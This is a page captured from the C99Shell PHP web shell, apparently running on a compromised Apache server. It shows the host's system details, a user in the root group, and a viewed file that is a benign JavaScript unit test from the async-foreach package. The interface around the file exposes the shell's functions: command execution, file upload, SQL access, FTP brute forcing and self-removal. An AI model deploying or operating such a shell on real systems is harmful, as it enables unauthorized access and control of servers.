!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/inventory.picotech.app/public_html/node_modules/async-foreach/test/   drwxr-xr-x
Free 28.2 GB of 117.98 GB (23.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     foreach_test.js (5.38 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/*global require:true, setTimeout:true */
var forEach = require('../lib/foreach').forEach;

exports['foreach'] = {
  setUp: function(done) {
    this.order = [];
    this.track = function() {
      [].push.apply(this.order, arguments);
    };
    done();
  },
  'Synchronous': function(test) {
    test.expect(1);
    var that = this;

    var arr = ["a", "b", "c"];
    forEach(arr, function(item, index, arr) {
      that.track("each", item, index, arr);
    });

    test.deepEqual(that.order, [
      "each", "a", 0, arr,
      "each", "b", 1, arr,
      "each", "c", 2, arr
    ], "should call eachFn for each array item, in order.");
    test.done();
  },
  'Synchronous, done': function(test) {
    test.expect(1);
    var that = this;

    var arr = ["a", "b", "c"];
    forEach(arr, function(item, index, arr) {
      that.track("each", item, index, arr);
    }, function(notAborted, arr) {
      that.track("done", notAborted, arr);
    });

    test.deepEqual(that.order, [
      "each", "a", 0, arr,
      "each", "b", 1, arr,
      "each", "c", 2, arr,
      "done", true, arr
      ], "should call eachFn for each array item, in order, followed by doneFn.");
    test.done();
  },
  'Synchronous, early abort': function(test) {
    test.expect(1);
    var that = this;

    var arr = ["a", "b", "c"];
    forEach(arr, function(item, index, arr) {
      that.track("each", item, index, arr);
      if (item === "b") { return false; }
    }, function(notAborted, arr) {
      that.track("done", notAborted, arr);
    });

    test.deepEqual(that.order, [
      "each", "a", 0, arr,
      "each", "b", 1, arr,
      "done", false, arr
      ], "should call eachFn for each array item, in order, followed by doneFn.");
    test.done();
  },
  'Asynchronous': function(test) {
    test.expect(1);
    var that = this;

    var arr = ["a", "b", "c"];
    forEach(arr, function(item, index, arr) {
      that.track("each", item, index, arr);
      var done = this.async();
      setTimeout(done, 10);
    });
    
    setTimeout(function() {
      test.deepEqual(that.order, [
        "each", "a", 0, arr,
        "each", "b", 1, arr,
        "each", "c", 2, arr
      ], "should call eachFn for each array item, in order.");
      test.done();
    }, 100);
  },
  'Asynchronous, done': function(test) {
    test.expect(1);
    var that = this;

    var arr = ["a", "b", "c"];
    forEach(arr, function(item, index, arr) {
      that.track("each", item, index, arr);
      var done = this.async();
      setTimeout(done, 10);
    }, function(notAborted, arr) {
      that.track("done", notAborted, arr);
      test.deepEqual(that.order, [
        "each", "a", 0, arr,
        "each", "b", 1, arr,
        "each", "c", 2, arr,
        "done", true, arr
        ], "should call eachFn for each array item, in order, followed by doneFn.");
      test.done();
    });
  },
  'Asynchronous, early abort': function(test) {
    test.expect(1);
    var that = this;

    var arr = ["a", "b", "c"];
    forEach(arr, function(item, index, arr) {
      that.track("each", item, index, arr);
      var done = this.async();
      setTimeout(function() {
        done(item !== "b");
      }, 10);
    }, function(notAborted, arr) {
      that.track("done", notAborted, arr);
      test.deepEqual(that.order, [
        "each", "a", 0, arr,
        "each", "b", 1, arr,
        "done", false, arr
        ], "should call eachFn for each array item, in order, followed by doneFn.");
      test.done();
    });
  },
  'Not actually asynchronous': function(test) {
    test.expect(1);
    var that = this;

    var arr = ["a", "b", "c"];
    forEach(arr, function(item, index, arr) {
      that.track("each", item, index, arr);
      var done = this.async();
      done();
    }, function(notAborted, arr) {
      that.track("done", notAborted, arr);
      test.deepEqual(that.order, [
        "each", "a", 0, arr,
        "each", "b", 1, arr,
        "each", "c", 2, arr,
        "done", true, arr
        ], "should call eachFn for each array item, in order, followed by doneFn.");
      test.done();
    });
  },
  'Not actually asynchronous, early abort': function(test) {
    test.expect(1);
    var that = this;

    var arr = ["a", "b", "c"];
    forEach(arr, function(item, index, arr) {
      that.track("each", item, index, arr);
      var done = this.async();
      done(item !== "b");
    }, function(notAborted, arr) {
      that.track("done", notAborted, arr);
      test.deepEqual(that.order, [
        "each", "a", 0, arr,
        "each", "b", 1, arr,
        "done", false, arr
        ], "should call eachFn for each array item, in order, followed by doneFn.");
      test.done();
    });
  },
  'Sparse array support': function(test) {
    test.expect(1);
    var that = this;

    var arr = [];
    arr[0] = "a";
    arr[9] = "z";

    forEach(arr, function(item, index, arr) {
      that.track("each", item, index, arr);
    });

    test.deepEqual(that.order, [
      "each", "a", 0, arr,
      "each", "z", 9, arr
    ], "should skip nonexistent array items.");
    test.done();
  },
  'Invalid length sanitization': function(test) {
    test.expect(1);
    var that = this;

    var obj = {length: 4294967299, 0: "a", 2: "b", 3: "c" };

    forEach(obj, function(item, index, arr) {
      that.track("each", item, index, arr);
    });

    test.deepEqual(that.order, [
      "each", "a", 0, obj,
      "each", "b", 2, obj
    ], "should sanitize length property (ToUint32).");
    test.done();
  }
};

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0055 ]--